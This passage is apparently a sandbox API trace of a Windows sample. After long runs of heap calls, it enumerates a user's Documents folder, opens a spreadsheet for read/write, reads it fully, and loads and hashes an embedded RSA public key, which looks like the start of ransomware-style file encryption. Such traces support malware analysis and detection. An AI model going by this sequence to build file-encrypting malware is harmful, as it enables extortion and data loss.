(HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d3a670 [0194.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d3a670 [0194.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.921] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\hlTCx olpB7AQb0\\") returned="hlTCx olpB7AQb0\\" [0194.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0194.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.921] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\") returned="UHfBjIaC\\" [0194.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0194.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0194.922] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\") returned="AzlD\\" [0194.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f090 [0194.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0194.922] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0194.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f090 | out: hHeap=0x6a0000) returned 1 [0194.923] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0194.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.923] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.924] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.924] PathFindFileNameW (pszPath="") returned="" [0194.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.924] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\hlTCx olpB7AQb0\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\hltcx olpb7aqb0\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42e42c70, ftCreationTime.dwHighDateTime=0x1d89aa9, ftLastAccessTime.dwLowDateTime=0x42bc0070, ftLastAccessTime.dwHighDateTime=0x1d8a1fb, ftLastWriteTime.dwLowDateTime=0x42bc0070, ftLastWriteTime.dwHighDateTime=0x1d8a1fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0194.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.930] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42e42c70, ftCreationTime.dwHighDateTime=0x1d89aa9, ftLastAccessTime.dwLowDateTime=0x42bc0070, ftLastAccessTime.dwHighDateTime=0x1d8a1fb, ftLastWriteTime.dwLowDateTime=0x42bc0070, ftLastWriteTime.dwHighDateTime=0x1d8a1fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.930] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f91000, ftCreationTime.dwHighDateTime=0x1d89842, ftLastAccessTime.dwLowDateTime=0x1e6fd010, ftLastAccessTime.dwHighDateTime=0x1d8a3d7, ftLastWriteTime.dwLowDateTime=0x1e6fd010, ftLastWriteTime.dwHighDateTime=0x1d8a3d7, nFileSizeHigh=0x0, nFileSizeLow=0x4f48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S7akFO0_2kX867.ods", cAlternateFileName="S7AKFO~1.ODS")) returned 1 [0194.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0194.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.931] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\hlTCx olpB7AQb0\\S7akFO0_2kX867.ods") returned=".ods" [0194.931] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\hlTCx olpB7AQb0\\S7akFO0_2kX867.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\hltcx olpb7aqb0\\s7akfo0_2kx867.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0194.932] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=20296) returned 1 [0194.932] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0194.934] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x4f22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.934] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0194.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0194.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0194.936] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.936] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x4f48, lpOverlapped=0x0) returned 1 [0194.940] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0194.940] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.940] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.940] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea678) returned 1 [0194.942] CryptCreateHash (in: hProv=0x6ea678, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0194.942] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.942] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0194.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0194.942] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0194.942] GetLastError () returned 0x0 [0194.942] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0194.942] CryptReleaseContext (hProv=0x6ea678, dwFlags=0x0) returned 1 [0194.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0194.942] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0194.942] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0194.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.942] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0194.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0194.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4f50) returned 0x2d49778 [0194.943] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9ed30 [0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e108 [0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f090 [0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e318 [0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 